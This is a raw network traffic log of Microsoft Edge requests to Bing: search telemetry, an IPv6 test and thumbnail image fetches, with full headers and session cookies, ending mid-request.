Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 3227
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144338.184eb7b9
GET

https://www.bing.com/ipv6test/test?FORM=MONITR

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /ipv6test/test?FORM=MONITR HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 75
Content-Type: text/html; charset=utf-8
Access-Control-Allow-Origin: https://www.bing.com
Cache-Control: no-cache, no-store, must-revalidate
Content-Encoding: gzip
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
X-EventID: 670163d38a214be18ffefcd40ac3d768
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-0Oxy2lnLAIAp06jUE8qDvljT16d9YQ5t2CC+M/uZNKE='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:39 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144339.184eb994
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3A%2Ci%3A11%22%2C%22AsResponseLength%22%3A%221031%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22Michael%20Schumacher%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A11%2Cig%3A2E639ED15AC64B9199100E3CDFA13BAC%22%2C%22AnswerInfo%22%3A%22MB%3B18%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22AsResponseLength%22%3A%22908%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337438%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A9%2Cig%3AC36DA702B7A04E1B97CA1C21988DEDFC%22%2C%22AnswerInfo%22%3A%22AS%3B13%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337438%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3A%2Ci%3A11%22%2C%22AsResponseLength%22%3A%221031%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22Michael%20Schumacher%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A11%2Cig%3A2E639ED15AC64B9199100E3CDFA13BAC%22%2C%22AnswerInfo%22%3A%22MB%3B18%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22AsResponseLength%22%3A%22908%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337438%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A9%2Cig%3AC36DA702B7A04E1B97CA1C21988DEDFC%22%2C%22AnswerInfo%22%3A%22AS%3B13%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337438%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:39 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144339.184ec081
GET

https://www.bing.com/th?id=OSK.f0690ff9596219946e86eee3c58d935c&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.f0690ff9596219946e86eee3c58d935c&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 2831
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144340.184ec663
GET

https://www.bing.com/th?id=OSK.4d68e57b31307fc5c39fd5aeaea6d241&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.4d68e57b31307fc5c39fd5aeaea6d241&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 6546
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144340.184ec899
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Av%2Ci%3A13%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144339405%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144339406%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%22%2C%22AsResponseLength%22%3A%221102%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144339517%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%2Cig%3AC5AA6F18678F438AAD7FC2BF04C3BD03%22%2C%22AnswerInfo%22%3A%22AS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144339517%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A14%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144340057%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144340115%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%22%2C%22AsResponseLength%22%3A%221258%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22vinted%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%2Cig%3A998B90648DA7405F8BEC8E26DD2BD9BE%22%2C%22AnswerInfo%22%3A%22MB%3B6%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A15%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144340738%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Av%2Ci%3A13%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144339405%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144339406%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%22%2C%22AsResponseLength%22%3A%221102%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144339517%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%2Cig%3AC5AA6F18678F438AAD7FC2BF04C3BD03%22%2C%22AnswerInfo%22%3A%22AS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144339517%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A14%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144340057%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144340115%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%22%2C%22AsResponseLength%22%3A%221258%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22vinted%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%2Cig%3A998B90648DA7405F8BEC8E26DD2BD9BE%22%2C%22AnswerInfo%22%3A%22MB%3B6%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A15%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144340738%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
